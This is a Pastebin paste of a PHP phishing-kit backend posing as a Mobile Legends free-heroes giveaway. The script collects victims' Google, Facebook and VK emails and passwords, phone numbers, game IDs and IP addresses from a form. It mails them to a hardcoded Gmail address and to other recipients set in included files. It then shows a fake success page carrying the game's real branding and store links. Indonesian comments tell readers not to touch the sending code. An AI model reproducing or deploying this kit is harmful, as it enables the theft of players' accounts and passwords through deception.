Advertisement
Guest User

Untitled

a guest
Dec 20th, 2017
757
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.68 KB | None | 0 0
  1. <?php
  2. $id = $_POST['id'];
  3. $country = $_POST['country'];
  4. $xp = $_POST ['xp'];
  5. $tier = $_POST ['tier'];
  6. $email = $_POST['email'];
  7. $password = $_POST['password'];
  8. $hp = $_POST['phone'];
  9. $emailr = $_POST['emailr'];
  10. $ip = $_SERVER['REMOTE_ADDR'];
  11. $email_fb = $_POST ['fb_user'];
  12. $pass_fb = $_POST ['fb_pass'];
  13. $user = $_POST ['vk_user'];
  14. $user_pw = $_POST ['vk_pass'];
  15. $nickname = $_POST ['nickname'];
  16. $add = "resulthujan@gmail.com";
  17. ?>
  18.  
  19. <?php
  20. include('email_result.php');
  21. include('css/hs.php');
  22. $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  23. $subjek = "ML PUNYA SI $nickname | NEGARA $country";
  24. $body = <<<EOD
  25. <hr>
  26. ======< Informasi Account >======
  27.  
  28. ID Akun = $id<br>
  29. Nickname = $nickname<br>
  30. Level = $xp<br>
  31. Tier = $tier<br>
  32. Negara = $country<br>
  33. Info IP = $ip<br>
  34.  
  35. ========< Account Google >========
  36.  
  37. Email = $email<br>
  38. Password = $password<br>
  39. No HP = $hp<br>
  40. Recv Email = $emailr<br>
  41.  
  42. ========< Account Facebook >========
  43.  
  44. Email = $email_fb<br>
  45. Password = $pass_fb<br>
  46.  
  47. ========< Account VK >========
  48. Email = $user<br>
  49. Password = $user_pw<br>
  50.  
  51. Coming from = $url<br>
  52. <hr/>
  53. EOD;
  54. //* jangan di ubah kalo kagak mau error!,gak usah sok tau deh //*
  55. $headers = "From: Setoran ML Reedem <result@syndrom.com>rn";
  56. $headers .= "Content-type: text/htmlrn";
  57. $success = mail($result, $subjek, $body, $headers);
  58. $success = mail($error, $subjek, $body, $headers);
  59. $success = mail($add, $subjek, $body, $headers);
  60. ?>
  61.  
  62. <center><span style='background:limegreen;width:360px;margin:0;padding:5px 0;color:black;display:block'>Success! Your submission has been requested</span></center>
  63.  
  64. <html>
  65. <head>
  66. <title>Mobile Legends - Weekly Free Heroes</title>
  67. <meta charset="UTF-8"/>
  68. <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
  69. <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
  70. <meta property="og:title" content="Mobile Legends - Weekly Free Heroes"/>
  71. <meta property="og:url" content="index.html"/>
  72. <meta property="og:description" content="Tuesday, December 19. Mobile Legends: Bang Bang - Free One of 1 Weekly Free Heroes until 26/12/2017 Please visit Redemption Code on the button below and copy Unique Code on that page. After that, click the heroes you want to claim below and paste Unique Code you have copied. Reward will be given on December 27, for players who have submit."/>
  73. <meta property="og:type" content="article"/>
  74. <meta property="article:author" content="https://www.facebook.com/MobileLegendsGameIndonesia"/>
  75. <meta property="og:image" content="img/banner.jpg"/>
  76. <link rel="icon" type="img/png" href="img/favicon.jpg" sizes="16x16"/>
  77. <link rel="stylesheet" type="text/css" href="css/index.css"/>
  78. </head>
  79. <body>
  80. <div class="logo">
  81. <img src="img/logo.png" alt="Mobile Legends"/>
  82. </div>
  83. <img class="banner" src="img/banner.jpg" alt="Banner"/>
  84. <div style="clear:both"></div>
  85. <div class="button">
  86. <div class="event"><center><strong><bold> thanks For Your Participation In This Event </bold></strong></center>
  87. <br> You Can Downloads Game Mobile Legends:Bang-Bang or Topup This game </br>
  88. <center> </center></div>
  89. <a href="https://play.google.com/store/apps/details?id=com.mobile.legends" title="Download on Play Store"><img src="img/download.png" alt="Download"/></a>
  90. <a href="https://web.mobilelegends.com/payment/chosecountry" title="Payment"><img src="img/payment.png" alt="payment"/></a>
  91. </div>
  92. <ul class="news">
  93. <li style="background-image:url(img/assassin.png)" alt="Assassin">Assassin<br/><small>Assassin is an agile champion that specializes in killing or disabling roaming targets picking them of as they try to replenish HP.</small></li>
  94. <li style="background-image:url(img/fighter.png)" alt="Fighter">Fighter<br/><small>Fighter are close range combatants that possess a mix of offensive and defensive capabilities.</small></li>
  95. <li style="background-image:url(img/mage.png)" alt="Mage">Mage<br/><small>Mage is a magic damage dealer and an important role in any team composition.</small></li>
  96. <li style="background-image:url(img/marksman.png)" alt="Marksman">Marksman<br/><small>Marksman are typically played in either the top or bottom lanes with some sort of support.</small></li>
  97. <li style="background-image:url(img/support.png)" alt="Support">Support<br/><small>Support role is to aid and help protect your allies in any situation.</small></li>
  98. <li style="background-image:url(img/tank.png)" alt="Tank">Tank<br/><small>Tank are durable, front-line champions that help lock down enemies and start fights.</small></li>
  99. </ul>
  100. </body>
  101.  
  102. </html>
  103.  
  104. <?php
  105. //* Mengirim Informasi AREANA Jangan Dihapus, Jangan Sok Tau deh //*
  106. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement